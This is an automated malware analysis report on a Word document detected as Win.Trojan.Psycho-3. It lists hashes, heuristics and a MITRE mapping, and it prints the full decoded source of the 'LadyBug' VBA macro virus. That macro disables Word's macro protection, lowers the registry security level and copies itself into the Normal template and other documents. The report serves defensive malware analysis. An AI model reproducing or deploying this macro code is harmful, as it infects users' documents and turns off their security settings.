Win.Trojan.Psycho-3 Office (OLE) malware analysis — malicious · 1410a042f2f1dc11

MALICIOUS

Office (OLE)

29.0 KB Created: 1997-04-26 17:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: dfbc9d8b1306d2fee2e1f291478bb2b9 SHA-1: 7e37a7dda2b7e80dbe90aac267aec5fa46331ae0 SHA-256: 1410a042f2f1dc11b45cb6f7653eef9b0e07d40d02e7a9a2f3c5f389a45d3724

200 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains a VBA macro named 'LadyBug' with an AutoClose subroutine, indicating it is designed to execute automatically when the document is closed. This macro attempts to infect the Normal template and other documents by exporting and importing the 'LadyBug' macro, and also modifies the registry to disable Word's macro security. The ClamAV detection names 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Fool-9' further support its malicious nature.

Heuristics 4

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1810 bytes
SHA-256: `fc76c3e43bb0f438ea94edb727f5a4aa691a6fb1807a64fa688b7aefdcf43d22`
Detection ClamAV: Doc.Trojan.Fool-9 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "LadyBug" Sub AutoClose() 'LadyBug Virus V1.00 'The WaLRuS 04/00 On Error Resume Next Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& ActiveDocument.ReadOnlyRecommended = False Selection.HomeKey Unit:=wdStory Selection.Find.ClearFormatting Selection.Find.Replacement.ClearFormatting With Selection.Find .Text = "mr" .Replacement.Text = "mrs" .Forward = True .Wrap = wdFindContinue .Format = False .MatchCase = False .MatchWholeWord = True .MatchAllWordForms = False End With Selection.Find.Execute Replace:=wdReplaceAll Set Norm = NormalTemplate.VBProject.VBComponents Set Doc = ActiveDocument.VBProject.VBComponents If Norm.Item("LadyBug").Name <> "LadyBug" Then Doc("LadyBug").Export "c:\LadyBug.drv" Set infect = NormalTemplate.VBProject ElseIf Doc.Item("LadyBug").Name <> "LadyBug" Then Norm("LAdyBug").Export "c:\LadyBug.drv" Set infect = ActiveDocument.VBProject End If With Dialogs(wdDialogFileSummaryInfo) .Subject = "LadyBug" .Execute End With infect.VBComponents.Import ("c:\LadyBug.drv") Kill ("c:\LadyBug.drv") ActiveDocument.Save End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.